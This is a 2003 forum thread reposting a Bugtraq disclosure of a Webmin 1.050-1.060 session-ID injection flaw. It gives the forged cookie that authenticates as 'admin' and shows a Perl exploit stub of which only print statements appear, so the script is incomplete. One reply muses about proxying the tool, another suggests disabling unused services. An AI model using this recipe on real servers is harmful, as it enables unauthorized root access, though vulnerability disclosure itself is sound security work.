Posted: Mon Feb 24, 2003 6:19 pm Post subject: Webmin 1.050 - 1.060 remote exploit - Dangerous
From Bugtraq today.
Attached is an exploit for the latest Webmin vulnerability. It relies on a
non-default setting (passdelay) to be enabled.
Webmin can verify user authentication by use of a session ID (SID) that is
assigned when a user successfully authenticates to Webmin. It is possible to
inject a fake SID into the session ID database by using a malicious username
containing control sequences used internally by Webmin.
This exploit simply creates a SID of 1234567890 for the user 'admin'. Then, it
is a simple case of creating a cookie in your favorite browser containing:
sid=1234567890; testing=1
Such that the Cookie HTTP header contains:
Cookie: sid=1234567890; testing=1
When the webmin server receives this cookie, it is verified as an authentic
SID and an attacker can take complete control of the Webmin server... this is
basically root access to the box it is running on.
Cheers,
Carl
webmin-exploit.pl
Code:
#!/usr/bin/perl
#
# Exploit for Webmin 1.050 -> 1.060 by Carl Livitt
#
# Inserts a fake session_id into the sessions list of webmin.
# Does no error checking... if remote host is not found, no
# error will be reported.
#
print "Webmin 1.050 - 1.060 Remote SID Injection Exploit\n";
print "By Carl Livitt <carl at learningshophull dot co dot uk>\n\n";
print "You should now have a session_id of 1234567890 for user 'admin' on host $hostname.\n";
print "Just set two cookies in your browser:\n\ttesting=1\n\tsid=1234567890\nand you will ";
print "be authenticated to the webmin server!\n\n";
print "Note: This will only work on a webmin server configured with the 'passdelay' option.\n";
Posted: Wed Feb 26, 2003 4:44 am Post subject:
Damn, I can't believe what a geek I've become... I took one look at that source and thought how simple it would be to port that to PHP, dump the netcat (make it independent), add the ability to pipe it through an anonymous HTTP proxy and slap a web interface on it...
Posted: Wed Feb 26, 2003 5:18 am Post subject:
Since this would really only be a threat from an inside source, wouldn't an old rule of thumb resolve this? Kill all unused services. Then when needed restart the service and when done kill it. Problem solved? Or am I missing something?
This is what I do with sshd due to outside access.